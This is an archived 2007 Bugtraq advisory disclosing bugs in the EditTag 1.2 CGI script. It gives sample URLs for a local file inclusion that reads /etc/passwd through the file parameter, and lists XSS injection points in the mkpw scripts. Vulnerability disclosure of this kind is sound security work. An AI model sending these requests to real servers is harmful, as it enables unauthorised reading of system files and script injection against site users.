Multiple bugs in EditTag

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Multiple bugs in EditTag
From: nj@xxxxxxxxxx
Date: 5 Jan 2007 17:26:29 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Script: EditTag
Version: 1.2
Author: Greg Billock (dmacewen@xxxxxxx)
Discoverer: NetJackal (nima_501[4T]yAhoo[D0T]com - nj[4T]hackerz[D0T]ir)

I am sorry for my BAD English.

Description:

1) Local file injection:
An attacker can use edittag.cgi or edittag_mp.cgi (maybe .pl) to inject files 
(ex. /etc/passwd)

http://www.victim/edittag/edittag.cgi?file=INJECT
http://www.victim/edittag/edittag.pl?file=INJECT
http://www.victim/edittag/edittag_mp.cgi?file=INJECT
http://www.victim/edittag/edittag_mp.pl?file=INJECT

ex. http://www.victim/edittag/edittag_mp.pl?file=/etc/passwd

2)XSS

http://www.victim/edittag/mkpw_mp.cgi?plain=XSS
http://www.victim/edittag/mkpw.pl?plain=XSS
http://www.victim/edittag/mkpw.cgi?plain=XSS

Prev by Date: Advisory 01/2007: WordPress CSRF Protection XSS Vulnerability
Next by Date: [USN-402-1] Avahi vulnerability
Previous by thread: Advisory 01/2007: WordPress CSRF Protection XSS Vulnerability
Next by thread: [USN-402-1] Avahi vulnerability
Index(es):
- Date
- Thread